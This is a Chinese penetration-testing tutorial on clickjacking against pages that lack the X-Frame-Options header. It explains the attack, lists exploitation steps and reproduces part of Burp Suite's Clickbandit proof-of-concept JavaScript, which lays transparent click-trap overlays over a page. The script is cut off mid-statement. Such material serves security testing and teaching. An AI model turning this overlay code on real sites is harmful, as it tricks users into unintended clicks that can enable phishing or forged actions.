【web-实战】点击劫持(缺失X-Frame-Options)

目录

一、简述:

二、利用

第一步:漏扫

第二步:劫持模板

第三步:配置劫持点

第四步:点击


一、简述:

1、点击劫持 (Clickjacking) 技术又称为界面伪装攻击 (UI redress attack),是一种视觉上的欺骗手段;其前提是目标页面允许被其他站点嵌入 iframe,即响应中缺少 X-Frame-Options(或 CSP frame-ancestors)头

2、攻击者使用一个或多个透明的 iframe 覆盖在一个正常的网页上,然后诱使用户在该网页上进行操作,当用户在不知情的情况下点击透明的 iframe 页面时,用户的操作已经被劫持到攻击者事先设计好的恶意按钮或链接上

3、攻击者既可以通过点击劫持设计一个独立的恶意网站,执行钓鱼攻击等;也可以与 XSS 和 CSRF 攻击相结合,突破传统的防御措施,提升漏洞的危害程度



二、利用

第一步:漏扫

【web-实战】点击劫持(缺失X-Frame-Options)_第1张图片


第二步:劫持模板

【web-实战】点击劫持(缺失X-Frame-Options)_第2张图片

【web-实战】点击劫持(缺失X-Frame-Options)_第3张图片

/* Copyright PortSwigger Ltd. All rights reserved. Usage is subject to the Burp Suite license terms. See https://portswigger.net for more details. */
!function(){
	// Module-level state shared by the helpers below: `doc`, `width` and
	// `height` are read by addClickTrap/generatePoc; `initialZoomFactor`,
	// `win` and `clicks` are not referenced in the visible part of the file
	// (presumably assigned further down).
	var initialZoomFactor = '1.0', win, doc, width, height, clicks = [];
	// Overlays `element` with an absolutely positioned, half-transparent div
	// (placed via findPos, sized from the element's offset box) and, on a
	// captured click, forwards the click's page coordinates to generatePoc.
	// `minusY`, when truthy, is subtracted from the click's pageY.
	function addClickTrap(element, minusY) {
		var clickTrap = doc.createElement('div'), cords = findPos(element);
		// NOTE(review): 'none' is not a valid background-color value, so this
		// assignment is presumably ignored by the browser — confirm.
		clickTrap.style.backgroundColor = 'none';
		clickTrap.style.border = 'none';
		clickTrap.style.position = 'absolute';
		clickTrap.style.left = cords[0] + 'px';
		clickTrap.style.top = cords[1] + 'px';
		clickTrap.style.width = element.offsetWidth + 'px';
		clickTrap.style.height = element.offsetHeight + 'px';
		// NOTE(review): this reads `element.zIndex`, not `element.style.zIndex`;
		// DOM elements do not expose a zIndex property, so this branch looks
		// unreachable for real elements — confirm.
		if(element.zIndex || element.zIndex === '0') {
			clickTrap.style.zIndex = +element.zIndex+1;
		}
		clickTrap.style.opacity = '0.5';
		clickTrap.style.cursor = 'pointer';
		// Marker property identifying the overlay; not read anywhere in the
		// visible part of the file.
		clickTrap.clickTrap = 1;
		// Capture-phase listener: the overlay sees the click first and
		// suppresses it before it reaches the underlying element.
		clickTrap.addEventListener('click', function(e) {
			// NOTE(review): `e.page` is not a MouseEvent property, so `y` is
			// undefined whenever `minusY` is falsy — confirm what was intended.
			generatePoc({x:e.pageX, y: minusY?e.pageY-minusY : e.page});
			e.preventDefault();
			e.stopPropagation();
			return false;
		}, true);
		doc.body.appendChild(clickTrap);
	}
	function addMessage(msg) {
		// Shows a transient notice bar fixed to the bottom of the page and
		// removes it again after four seconds. `msg` is inserted as a text
		// node, so it is never interpreted as HTML.
		var bar = document.createElement('div');
		var barStyles = {
			width: '100%',
			height: '20px',
			backgroundColor: '#fff5bf',
			border: '1px solid #ff9900',
			padding: '5px',
			position: 'fixed',
			bottom: '0',
			left: '0',
			zIndex: 100000,
			textAlign: 'center',
			fontFamily: 'Arial',
			color: '#000'
		};
		for (var prop in barStyles) {
			if (barStyles.hasOwnProperty(prop)) {
				bar.style[prop] = barStyles[prop];
			}
		}
		bar.appendChild(document.createTextNode(msg));
		document.body.appendChild(bar);
		setTimeout(function () {
			document.body.removeChild(bar);
		}, 4000);
	}
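	// Coerces `str` to a string and replaces every character outside a small
	// allow-list (word characters, space, ':' '-' '/' '.' '?' '=') with a
	// decimal numeric character reference, so the value can be embedded in
	// generated HTML without breaking out of markup or attribute context.
	// Surrogate pairs are emitted as one reference for the astral code point
	// (e.g. '&#128512;') rather than two invalid lone-surrogate references.
	function htmlEscape(str) {
		var text = str + '';
		return text.replace(/[\uD800-\uDBFF][\uDC00-\uDFFF]|[^\w :\-\/.?=]/g, function (c) {
			var code = c.charCodeAt(0);
			if (c.length === 2) {
				// Combine high and low surrogate into the astral code point.
				code = (code - 0xD800) * 0x400 + (c.charCodeAt(1) - 0xDC00) + 0x10000;
			}
			return '&#' + code + ';';
		});
	}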
	function getDocHeight(D) {
		// Returns the largest of the six height metrics reported for the body
		// and the root element of document `D`.
		var body = D.body;
		var root = D.documentElement;
		var candidates = [
			body.scrollHeight, root.scrollHeight,
			body.offsetHeight, root.offsetHeight,
			body.clientHeight, root.clientHeight
		];
		return Math.max.apply(Math, candidates);
	}
	function getDocWidth(D) {
		// Returns the largest of the six width metrics reported for the body
		// and the root element of document `D`.
		var body = D.body;
		var root = D.documentElement;
		var candidates = [
			body.scrollWidth, root.scrollWidth,
			body.offsetWidth, root.offsetWidth,
			body.clientWidth, root.clientWidth
		];
		return Math.max.apply(Math, candidates);
	}
	function findPos(obj) {
		// Returns [left, top] for `obj`. When it has an offsetParent, the
		// offsetLeft/offsetTop of every node up the offsetParent chain
		// (including the last node, which has none) are summed; otherwise the
		// `x`/`y` properties are used when both are truthy, else [0, 0].
		var left = 0;
		var top = 0;
		if (obj.offsetParent) {
			var node = obj;
			do {
				left += node.offsetLeft;
				top += node.offsetTop;
				node = node.offsetParent;
			} while (node);
		} else if (obj.x && obj.y) {
			left += obj.x;
			top += obj.y;
		}
		return [left, top];
	}
	function generatePoc(config) {
		var html = '', child = '', elementWidth = 1, elementHeight = 1, maxWidth = width, maxHeight = height, cords, zoomIncrement = 1, desiredX = 200, desiredY = 200, parentOffsetWidth, parentOffsetHeight,
			element = config.element, x = config.x, y = config.y, pixelMode = false;
		if(config.clickTracking) {
			elementWidth = config.clickTracking[0].width;
			elementHeight = config.clickTracking[0].height;
			x = config.clickTracking[0].left;
			y = config.clickTracking[0].top;
			zoomIncrement = 1;
			config.currentPosition = 0;
		} else {
			config.clickTracking = [];
			if(element) {
				elementWidth = element.offsetWidth;
				elementHeight = element.offsetHeight;
				cords = findPos(element);
				x = cords[0];
				y = cords[1];
				zoomIncrement = 1;
			} else {
				zoomIncrement = 5;
				pixelMode = true;
			}
		}
		parentOffsetWidth = desiredX - x;
		parentOffsetHeight = desiredY - y;
		child = btoa('
                    
                    
